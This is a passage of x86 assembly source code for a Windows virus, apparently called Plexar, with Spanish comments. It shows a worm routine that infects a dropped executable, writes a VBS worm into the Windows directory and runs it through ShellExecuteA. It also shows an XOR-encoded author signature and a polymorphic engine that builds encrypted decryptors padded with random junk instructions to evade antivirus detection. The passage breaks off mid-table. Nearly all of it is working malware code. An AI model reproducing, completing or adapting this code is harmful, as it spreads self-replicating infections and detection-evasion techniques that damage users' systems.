MOV FS:[EAX], ESP
|
|||
|
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH NULL
|
|||
|
APICALL VirtualAlloc
|
|||
|
MOV DWO [VFreeX], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_Fin
|
|||
|
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH EAX
|
|||
|
APICALL GetWindowsDirectoryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_Fin
|
|||
|
|
|||
|
PUSH DWO [VFreeX]
|
|||
|
APICALL SetCurrentDirectoryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_Fin
|
|||
|
|
|||
|
PUSH MEM_DECOMMIT
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH 12345678h
|
|||
|
ORG $-4
|
|||
|
VFreeX DD 00000000h
|
|||
|
APICALL VirtualFree
|
|||
|
|
|||
|
LEA EBX, OFS [WScript_Exe]
|
|||
|
CALL @Existe_Archivo
|
|||
|
JNC @VBS_Fin
|
|||
|
|
|||
|
LEA EBX, OFS [Raxelp_vbs]
|
|||
|
CALL @Existe_Archivo
|
|||
|
JC @VBS_Fin
|
|||
|
|
|||
|
PUSH 10d
|
|||
|
POP EBX
|
|||
|
CALL Random
|
|||
|
XCHG ECX, EAX
|
|||
|
LEA EDI, OFS [Nombres_Varios]
|
|||
|
INC ECX
|
|||
|
@VBS1:
|
|||
|
XOR AL, AL
|
|||
|
SCASB
|
|||
|
JNZ @VBS1
|
|||
|
LOOP @VBS1
|
|||
|
|
|||
|
PUSH EDI
|
|||
|
@VBS2:
|
|||
|
XOR AL, AL
|
|||
|
INC ECX
|
|||
|
SCASB
|
|||
|
JNZ @VBS2
|
|||
|
DEC ECX
|
|||
|
POP EDI
|
|||
|
|
|||
|
MOV BY [LargoVBS], CL
|
|||
|
MOV DWO [GuardaNom], EDI
|
|||
|
|
|||
|
MOV EBX, EDI
|
|||
|
CALL Droppear_PE
|
|||
|
JC @VBS_Fin
|
|||
|
|
|||
|
MOV EBX, DWO [GuardaNom]
|
|||
|
CALL Infecta_PE
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|||
|
PUSH CREATE_NEW
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH GENERIC_READ + GENERIC_WRITE
|
|||
|
LEA EAX, OFS [Raxelp_vbs]
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [FHandle_WVBS], EAX
|
|||
|
INC EAX
|
|||
|
JZ @VBS_Fin
|
|||
|
DEC EAX
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH 4096d
|
|||
|
PUSH EBX
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileMappingA
|
|||
|
MOV DWO [MHandle_WVBS], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_CierraFile
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH FILE_MAP_READ + FILE_MAP_WRITE
|
|||
|
PUSH EAX
|
|||
|
APICALL MapViewOfFile
|
|||
|
MOV DWO [BaseMap_WVBS], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_DesMapea
|
|||
|
|
|||
|
XCHG EDI, EAX
|
|||
|
LEA ESI, OFS [Gusano_VBS]
|
|||
|
PUSH L_Gusano_VBS
|
|||
|
POP ECX
|
|||
|
REP MOVSB
|
|||
|
|
|||
|
PUSH EDI
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH EDI
|
|||
|
APICALL GetWindowsDirectoryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_CierraTodo
|
|||
|
POP EDI
|
|||
|
ADD EDI, EAX
|
|||
|
MOV BYTE PTR [EDI], "\"
|
|||
|
INC EDI
|
|||
|
|
|||
|
MOV ESI, DWO [GuardaNom]
|
|||
|
MOVZX ECX, BY [LargoVBS]
|
|||
|
REP MOVSB
|
|||
|
|
|||
|
LEA ESI, OFS [Gusano_VBS2]
|
|||
|
PUSH L_Gusano_VBS2
|
|||
|
POP ECX
|
|||
|
REP MOVSB
|
|||
|
SUB EDI, DWO [BaseMap_WVBS]
|
|||
|
|
|||
|
PUSH DWO [BaseMap_WVBS]
|
|||
|
APICALL UnmapViewOfFile
|
|||
|
|
|||
|
PUSH DWO [MHandle_WVBS]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EDI
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL SetFilePointer
|
|||
|
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL SetEndOfFile
|
|||
|
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
CALL @VBS3
|
|||
|
DB "SHELL32.DLL", 00h
|
|||
|
@VBS3: APICALL LoadLibraryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_Fin
|
|||
|
|
|||
|
CALL @VBS4
|
|||
|
DB "ShellExecuteA", 00h, 5 DUP (90h)
|
|||
|
@VBS4: PUSH EAX
|
|||
|
APICALL GetProcAddress
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_Fin
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
LEA EDX, OFS [Raxelp_VBS]
|
|||
|
PUSH EDX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
CALL EAX
|
|||
|
|
|||
|
@VBS_Fin:
|
|||
|
|
|||
|
XOR ECX, ECX
|
|||
|
POP DWORD PTR FS:[ECX]
|
|||
|
POP ECX
|
|||
|
|
|||
|
IF DEBUG
|
|||
|
|
|||
|
POPAD
|
|||
|
RET
|
|||
|
|
|||
|
ELSE
|
|||
|
|
|||
|
MOV DWO [GuardaEBP3], EBP
|
|||
|
POPAD
|
|||
|
|
|||
|
MOV EBX, 12345678h
|
|||
|
ORG $-4
|
|||
|
GuardaEBP3 DD 00000000h
|
|||
|
|
|||
|
PUSH NULL
|
|||
|
CALL [EBX+ExitThread]
|
|||
|
RET
|
|||
|
|
|||
|
ENDIF
|
|||
|
|
|||
|
@VBS_CierraTodo:
|
|||
|
|
|||
|
PUSH DWO [BaseMap_WVBS]
|
|||
|
APICALL UnmapViewOfFile
|
|||
|
|
|||
|
@VBS_DesMapea:
|
|||
|
|
|||
|
PUSH DWO [MHandle_WVBS]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
@VBS_CierraFile:
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH DWO [Scriptum]
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL SetFilePointer
|
|||
|
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL SetEndOfFile
|
|||
|
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
JMP @VBS_Fin
|
|||
|
|
|||
|
; Rutina para revisar la existencia de un archivo.
|
|||
|
; EBX -> Nombre de archivo.
|
|||
|
; Retorna acarreo si existe
|
|||
|
|
|||
|
@Existe_Archivo:
|
|||
|
|
|||
|
PUSH EBX
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
|||
|
PUSH SIZEOF_WIN32_FIND_DATA
|
|||
|
PUSH NULL
|
|||
|
APICALL VirtualAlloc
|
|||
|
MOV DWO [VAllocZ], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @EA_Negativo
|
|||
|
POP EBX
|
|||
|
|
|||
|
PUSH EAX
|
|||
|
PUSH EBX
|
|||
|
APICALL FindFirstFileA
|
|||
|
INC EAX
|
|||
|
JZ @EA_Negativo
|
|||
|
|
|||
|
DEC EAX
|
|||
|
PUSH EAX
|
|||
|
APICALL FindClose
|
|||
|
|
|||
|
PUSH MEM_DECOMMIT
|
|||
|
PUSH SIZEOF_WIN32_FIND_DATA
|
|||
|
PUSH 12345678h
|
|||
|
ORG $-4
|
|||
|
VAllocZ DD 00000000h
|
|||
|
APICALL VirtualFree
|
|||
|
|
|||
|
STC
|
|||
|
RET 0
|
|||
|
|
|||
|
@EA_Negativo:
|
|||
|
|
|||
|
PUSH MEM_DECOMMIT
|
|||
|
PUSH SIZEOF_WIN32_FIND_DATA
|
|||
|
PUSH DWO [VAllocZ]
|
|||
|
APICALL VirtualFree
|
|||
|
|
|||
|
CLC
|
|||
|
RET 0
|
|||
|
|
|||
|
|
|||
|
Worm_VBS ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
DB "[" XOR 40h
|
|||
|
DB "D" XOR 40h
|
|||
|
DB "e" XOR 40h
|
|||
|
DB "s" XOR 40h
|
|||
|
DB "i" XOR 40h
|
|||
|
DB "g" XOR 40h
|
|||
|
DB "n" XOR 40h
|
|||
|
DB "e" XOR 40h
|
|||
|
DB "d" XOR 40h
|
|||
|
DB " " XOR 40h
|
|||
|
DB "b" XOR 40h
|
|||
|
DB "y" XOR 40h
|
|||
|
DB " " XOR 40h
|
|||
|
DB "L" XOR 40h
|
|||
|
DB "i" XOR 40h
|
|||
|
DB "t" XOR 40h
|
|||
|
DB "e" XOR 40h
|
|||
|
DB "S" XOR 40h
|
|||
|
DB "y" XOR 40h
|
|||
|
DB "s" XOR 40h
|
|||
|
DB "]" XOR 40h
|
|||
|
DB 40h
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; PXPE: Plexar Polymorphic Engine: Another Lame Poly Written By Me.
|
|||
|
;
|
|||
|
; ESI -> Origen
|
|||
|
; EDI -> Destino
|
|||
|
; ECX -> Tama<6D>o
|
|||
|
|
|||
|
PXPE PROC
|
|||
|
|
|||
|
MOV DWO [Origen], ESI
|
|||
|
MOV DWO [Destino], EDI
|
|||
|
MOV DWO [Tama<EFBFBD>o], ECX
|
|||
|
|
|||
|
CALL @Inicializar_Semillas
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX
|
|||
|
CALL @Aleatorio
|
|||
|
MOV DWO [Llave], EAX
|
|||
|
|
|||
|
MOV EDI, DWO [Destino]
|
|||
|
|
|||
|
; DELTA
|
|||
|
|
|||
|
PUSH EDI
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
POP EDX
|
|||
|
SUB EDX, EDI
|
|||
|
MOV DWO [GuardaDelta2], EDX
|
|||
|
|
|||
|
MOV AL, 0E8h ; CALL
|
|||
|
STOSB
|
|||
|
XOR EAX, EAX ; Delta
|
|||
|
STOSD
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
CALL @Popear_Delta
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
CALL @Meter_Tama<EFBFBD>o
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
|
|||
|
CALL @Colocar_Lea
|
|||
|
CALL @Basura
|
|||
|
MOV DWO [GuardaLoop], EDI
|
|||
|
CALL @Basura
|
|||
|
|
|||
|
MOV AX, 03781h ; XOR DWORD PTR [EDI]
|
|||
|
STOSW
|
|||
|
MOV EAX, DWO [Llave]
|
|||
|
STOSD
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
CALL @SumaCuatro
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
|
|||
|
MOV AL, 049h
|
|||
|
STOSB
|
|||
|
MOV AX, 850Fh
|
|||
|
STOSW
|
|||
|
MOV EAX, DWO [GuardaLoop]
|
|||
|
SUB EAX, EDI
|
|||
|
SUB EAX, 04h
|
|||
|
STOSD
|
|||
|
|
|||
|
CALL @Basura
|
|||
|
CALL @Basura
|
|||
|
|
|||
|
MOV EAX, EDI
|
|||
|
SUB EAX, DWO [Destino]
|
|||
|
SUB EAX, 05h
|
|||
|
MOV EBX, DWO [GuardaDelta]
|
|||
|
SUB DWORD PTR [EBX], EAX
|
|||
|
MOV EDX, DWO [GuardaDelta2]
|
|||
|
SUB DWORD PTR [EBX], EDX
|
|||
|
|
|||
|
MOV ESI, DWO [Origen]
|
|||
|
MOV ECX, DWO [Tama<EFBFBD>o]
|
|||
|
MOV EAX, DWO [Llave]
|
|||
|
|
|||
|
@ReCopia:
|
|||
|
MOVSD
|
|||
|
XOR DWORD PTR [EDI-4h], EAX
|
|||
|
LOOP @ReCopia
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@Inicializar_Semillas:
|
|||
|
|
|||
|
LEA EDI, OFS [@SaveSemilla]
|
|||
|
RDTSC
|
|||
|
STOSD
|
|||
|
PUSH 04h
|
|||
|
POP EDI
|
|||
|
LEA ESI, OFS [@SaveSemilla]
|
|||
|
CALL CRC32
|
|||
|
MOV DWO [Semilla_1], EAX
|
|||
|
|
|||
|
APICALL GetTickCount
|
|||
|
ADD EAX, EAX
|
|||
|
NOT EAX ; que mierda...
|
|||
|
PUSH 04h
|
|||
|
POP EDI
|
|||
|
LEA ESI, OFS [@SaveSemilla]
|
|||
|
CALL CRC32
|
|||
|
MOV DWO [Semilla_2], EAX
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
; Un indecente generador de numeros aleatorios...
|
|||
|
;
|
|||
|
; EBX -> Limite.
|
|||
|
|
|||
|
@Aleatorio:
|
|||
|
|
|||
|
PUSH EDI
|
|||
|
PUSH ECX
|
|||
|
PUSH EDX
|
|||
|
PUSH EBX
|
|||
|
|
|||
|
MOV EAX, DWO [Semilla_1]
|
|||
|
IMUL EAX, Mierda_1
|
|||
|
ADD EAX, Mierda_2
|
|||
|
MOV DWO [Semilla_1], EAX
|
|||
|
|
|||
|
LEA EDI, OFS [Milonga]
|
|||
|
STOSD
|
|||
|
|
|||
|
MOV EBX, DWO [Semilla_2]
|
|||
|
IMUL EBX, Mierda_3
|
|||
|
ADD EBX, Mierda_4
|
|||
|
MOV DWO [Semilla_2], EBX
|
|||
|
XCHG EAX, EBX
|
|||
|
STOSD
|
|||
|
|
|||
|
LEA ESI, OFS [Milonga]
|
|||
|
PUSH 08h
|
|||
|
POP EDI
|
|||
|
CALL CRC32
|
|||
|
|
|||
|
POP EBX
|
|||
|
XOR EDX, EDX
|
|||
|
DIV EBX
|
|||
|
|
|||
|
XCHG EDX, EAX
|
|||
|
|
|||
|
POP EDX
|
|||
|
POP ECX
|
|||
|
POP EDI
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
Milonga DB 9 DUP (00h)
|
|||
|
|
|||
|
@Popear_Delta:
|
|||
|
|
|||
|
PUSH 04h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
OR EAX, EAX
|
|||
|
JZ @Popear_Delta_I
|
|||
|
CMP EAX, 01h
|
|||
|
JZ @Popear_Delta_II
|
|||
|
CMP EAX, 02h
|
|||
|
JZ @Popear_Delta_III
|
|||
|
CMP EAX, 03h
|
|||
|
JZ @Popear_Delta_IV
|
|||
|
|
|||
|
JMP @Popear_Delta_IV
|
|||
|
|
|||
|
@Popear_Delta_R:
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@Popear_Delta_I:
|
|||
|
MOV AL, 05Dh ; POP EBP
|
|||
|
STOSB
|
|||
|
MOV AX, 0ED81h ; SUB EBP
|
|||
|
STOSW
|
|||
|
MOV DWO [GuardaDelta], EDI
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
JMP @Popear_Delta_R
|
|||
|
|
|||
|
@Popear_Delta_II:
|
|||
|
MOV AL, 058h
|
|||
|
STOSB
|
|||
|
MOV AL, 02Dh
|
|||
|
STOSB
|
|||
|
MOV DWO [GuardaDelta], EDI
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
MOV AL, 095h
|
|||
|
STOSB
|
|||
|
JMP @Popear_Delta_R
|
|||
|
|
|||
|
@Popear_Delta_III:
|
|||
|
MOV AL, 05Bh
|
|||
|
STOSB
|
|||
|
MOV AL, 0BAh
|
|||
|
STOSB
|
|||
|
MOV DWO [GuardaDelta], EDI
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
MOV AX, 0D329h
|
|||
|
STOSW
|
|||
|
MOV AX, 0DD87h
|
|||
|
STOSW
|
|||
|
JMP @Popear_Delta_R
|
|||
|
|
|||
|
@Popear_Delta_IV:
|
|||
|
MOV AL, 05Ah
|
|||
|
STOSB
|
|||
|
MOV AL, 068h
|
|||
|
STOSB
|
|||
|
MOV DWO [GuardaDelta], EDI
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
MOV AL, 05Dh
|
|||
|
STOSB
|
|||
|
MOV AX, 0D587h
|
|||
|
STOSW
|
|||
|
MOV AX, 0D529h
|
|||
|
STOSW
|
|||
|
JMP @Popear_Delta_R
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>o:
|
|||
|
|
|||
|
PUSH 04h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
OR EAX, EAX
|
|||
|
JZ @Meter_Tama<EFBFBD>o_I
|
|||
|
CMP EAX, 01h
|
|||
|
JZ @Meter_Tama<EFBFBD>o_II
|
|||
|
CMP EAX, 02h
|
|||
|
JZ @Meter_Tama<EFBFBD>o_III
|
|||
|
CMP EAX, 03h
|
|||
|
JZ @Meter_Tama<EFBFBD>o_IV
|
|||
|
|
|||
|
JMP @Meter_Tama<EFBFBD>o_III
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>oR:
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>o_I:
|
|||
|
MOV AL, 0B9h
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o]
|
|||
|
STOSD
|
|||
|
JMP @Meter_Tama<EFBFBD>oR
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>o_II:
|
|||
|
MOV AL, 068h
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o]
|
|||
|
STOSD
|
|||
|
MOV AL, 059h
|
|||
|
STOSB
|
|||
|
JMP @Meter_Tama<EFBFBD>oR
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>o_III:
|
|||
|
MOV AL, 0BAh
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o]
|
|||
|
NOT EAX
|
|||
|
STOSD
|
|||
|
MOV AX, 0CA87h
|
|||
|
STOSW
|
|||
|
MOV AX, 0D1F7h
|
|||
|
STOSW
|
|||
|
JMP @Meter_Tama<EFBFBD>oR
|
|||
|
|
|||
|
@Meter_Tama<EFBFBD>o_IV:
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX
|
|||
|
CALL @Aleatorio
|
|||
|
XCHG EDX, EAX
|
|||
|
|
|||
|
MOV AL, 068h
|
|||
|
STOSB
|
|||
|
MOV EAX, EDX
|
|||
|
STOSD
|
|||
|
MOV AL, 058h
|
|||
|
STOSB
|
|||
|
MOV AL, 035h
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o]
|
|||
|
XOR EAX, EDX
|
|||
|
STOSD
|
|||
|
MOV AL, 091h
|
|||
|
STOSB
|
|||
|
JMP @Meter_Tama<EFBFBD>oR
|
|||
|
|
|||
|
@Colocar_LEA:
|
|||
|
|
|||
|
PUSH 03h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
OR EAX, EAX
|
|||
|
JZ @Colocar_Lea_I
|
|||
|
CMP EAX, 01h
|
|||
|
JZ @Colocar_Lea_II
|
|||
|
CMP EAX, 02h
|
|||
|
JZ @Colocar_Lea_III
|
|||
|
|
|||
|
JMP @Colocar_Lea_II
|
|||
|
|
|||
|
@Colocar_LEAR:
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@Colocar_LEA_I:
|
|||
|
MOV AX, 0BD8Dh
|
|||
|
STOSW
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
JMP @Colocar_LEAR
|
|||
|
|
|||
|
@Colocar_LEA_II:
|
|||
|
MOV AL, 0BFh
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
MOV AX, 0EF01h
|
|||
|
STOSW
|
|||
|
JMP @Colocar_LEAR
|
|||
|
|
|||
|
@Colocar_LEA_III:
|
|||
|
MOV AL, 068h
|
|||
|
STOSB
|
|||
|
MOV EAX, DWO [Origen]
|
|||
|
STOSD
|
|||
|
MOV AL, 05Ah
|
|||
|
STOSB
|
|||
|
MOV AX, 0EA01h
|
|||
|
STOSW
|
|||
|
MOV AX, 0D787h
|
|||
|
STOSW
|
|||
|
JMP @Colocar_LEAR
|
|||
|
|
|||
|
@SumaCuatro:
|
|||
|
|
|||
|
PUSH 04h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
OR EAX, EAX
|
|||
|
JZ @SumaCuatro_I
|
|||
|
CMP EAX, 01h
|
|||
|
JZ @SumaCuatro_II
|
|||
|
CMP EAX, 02h
|
|||
|
JZ @SumaCuatro_III
|
|||
|
CMP EAX, 03h
|
|||
|
JZ @SumaCuatro_IV
|
|||
|
|
|||
|
JMP @SumaCuatro_III
|
|||
|
|
|||
|
@SumaCuatroR:
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@SumaCuatro_I:
|
|||
|
MOV AX, 0C781h
|
|||
|
STOSW
|
|||
|
MOV EAX, 00000004h
|
|||
|
STOSD
|
|||
|
JMP @SumaCuatroR
|
|||
|
|
|||
|
@SumaCuatro_II:
|
|||
|
MOV EAX, 47474747h
|
|||
|
STOSD
|
|||
|
JMP @SumaCuatroR
|
|||
|
|
|||
|
@SumaCuatro_III:
|
|||
|
MOV AL, 47h
|
|||
|
STOSB
|
|||
|
MOV AX, 0C781h
|
|||
|
STOSW
|
|||
|
MOV EAX, 00000002h
|
|||
|
STOSD
|
|||
|
MOV AL, 47h
|
|||
|
STOSB
|
|||
|
JMP @SumaCuatroR
|
|||
|
|
|||
|
@SumaCuatro_IV:
|
|||
|
MOV AX, 0C781h
|
|||
|
STOSW
|
|||
|
MOV EAX, 00000003h
|
|||
|
STOSD
|
|||
|
MOV AL, 47h
|
|||
|
STOSB
|
|||
|
JMP @SumaCuatroR
|
|||
|
|
|||
|
; Generador de basura! Mega Lamer!!!
|
|||
|
|
|||
|
@Basura:
|
|||
|
|
|||
|
PUSH 10d
|
|||
|
POP ECX
|
|||
|
|
|||
|
@BasLoop:
|
|||
|
|
|||
|
PUSH 08d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
|
|||
|
OR EAX, EAX
|
|||
|
JZ @Basura_1
|
|||
|
CMP EAX, 1h
|
|||
|
JZ @Basura_2
|
|||
|
CMP EAX, 2h
|
|||
|
JZ @Basura_3
|
|||
|
CMP EAX, 3h
|
|||
|
JZ @Basura_4
|
|||
|
CMP EAX, 4h
|
|||
|
JZ @Basura_5
|
|||
|
CMP EAX, 5h
|
|||
|
JZ @Basura_6
|
|||
|
CMP EAX, 6h
|
|||
|
JZ @Basura_7
|
|||
|
|
|||
|
JMP @Basura_1
|
|||
|
|
|||
|
@BasuraR:
|
|||
|
|
|||
|
LOOP @BasLoop
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
@Basura_1:
|
|||
|
|
|||
|
PUSH 07h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
LEA ESI, OFS [@B1_Tabla]
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSB
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX
|
|||
|
CALL @Aleatorio
|
|||
|
STOSD
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B1_Tabla:
|
|||
|
DB 0B8h ; MOV EAX
|
|||
|
DB 0BBh ; MOV EBX
|
|||
|
DB 0BAh ; MOV EDX
|
|||
|
DB 0BEh ; MOV ESI
|
|||
|
DB 005h ; ADD EAX
|
|||
|
DB 02Dh ; SUB EAX
|
|||
|
DB 035h ; XOR EAX
|
|||
|
DB 015h ; ADC EAX
|
|||
|
|
|||
|
@Basura_2:
|
|||
|
|
|||
|
PUSH 15d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
ADD EAX, EAX
|
|||
|
LEA ESI, OFS [@B2_Tabla]
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSW
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX
|
|||
|
CALL @Aleatorio
|
|||
|
STOSD
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B2_Tabla:
|
|||
|
DB 081h, 0C3h ; ADD EBX
|
|||
|
DB 081h, 0C2h ; ADD EDX
|
|||
|
DB 081h, 0C6h ; ADD ESI
|
|||
|
DB 081h, 0EBh ; SUB EBX
|
|||
|
DB 081h, 0EAh ; SUB EDX
|
|||
|
DB 081h, 0EEh ; SUB ESI
|
|||
|
DB 081h, 0F6h ; XOR ESI
|
|||
|
DB 081h, 0F2h ; XOR EDX
|
|||
|
DB 081h, 0F3h ; XOR EBX
|
|||
|
DB 081h, 0D3h ; ADC EBX
|
|||
|
DB 081h, 0D2h ; ADC EDX
|
|||
|
DB 081h, 0D6h ; ADC ESI
|
|||
|
DB 069h, 0C0h ; IMUL EAX
|
|||
|
DB 069h, 0DBh ; IMUL EBX
|
|||
|
DB 069h, 0D2h ; IMUL EDX
|
|||
|
DB 069h, 0F6h ; IMUL ESI
|
|||
|
|
|||
|
@Basura_3:
|
|||
|
|
|||
|
PUSH 35d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
ADD EAX, EAX
|
|||
|
LEA ESI, OFS [@B3_Tabla]
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSW
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B3_Tabla:
|
|||
|
DB 001h, 0D8h ; ADD EAX, EBX
|
|||
|
DB 001h, 0D0h ; ADD EAX, EDX
|
|||
|
DB 001h, 0F0h ; ADD EAX, ESI
|
|||
|
DB 001h, 0D3h ; ADD EBX, EDX
|
|||
|
DB 001h, 0F3h ; ADD EBX, ESI
|
|||
|
DB 001h, 0C3h ; ADD EBX, EAX
|
|||
|
DB 001h, 0DAh ; ADD EDX, EBX
|
|||
|
DB 001h, 0F2h ; ADD EDX, ESI
|
|||
|
DB 001h, 0C2h ; ADD EDX, EAX
|
|||
|
DB 001h, 0DEh ; ADD ESI, EBX
|
|||
|
DB 001h, 0D6h ; ADD ESI, EDX
|
|||
|
DB 001h, 0C6h ; ADD ESI, EAX
|
|||
|
DB 029h, 0D8h ; SUB EAX, EBX
|
|||
|
DB 029h, 0D0h ; SUB EAX, EDX
|
|||
|
DB 029h, 0F0h ; SUB EAX, ESI
|
|||
|
DB 029h, 0C3h ; SUB EBX, EAX
|
|||
|
DB 029h, 0D3h ; SUB EBX, EDX
|
|||
|
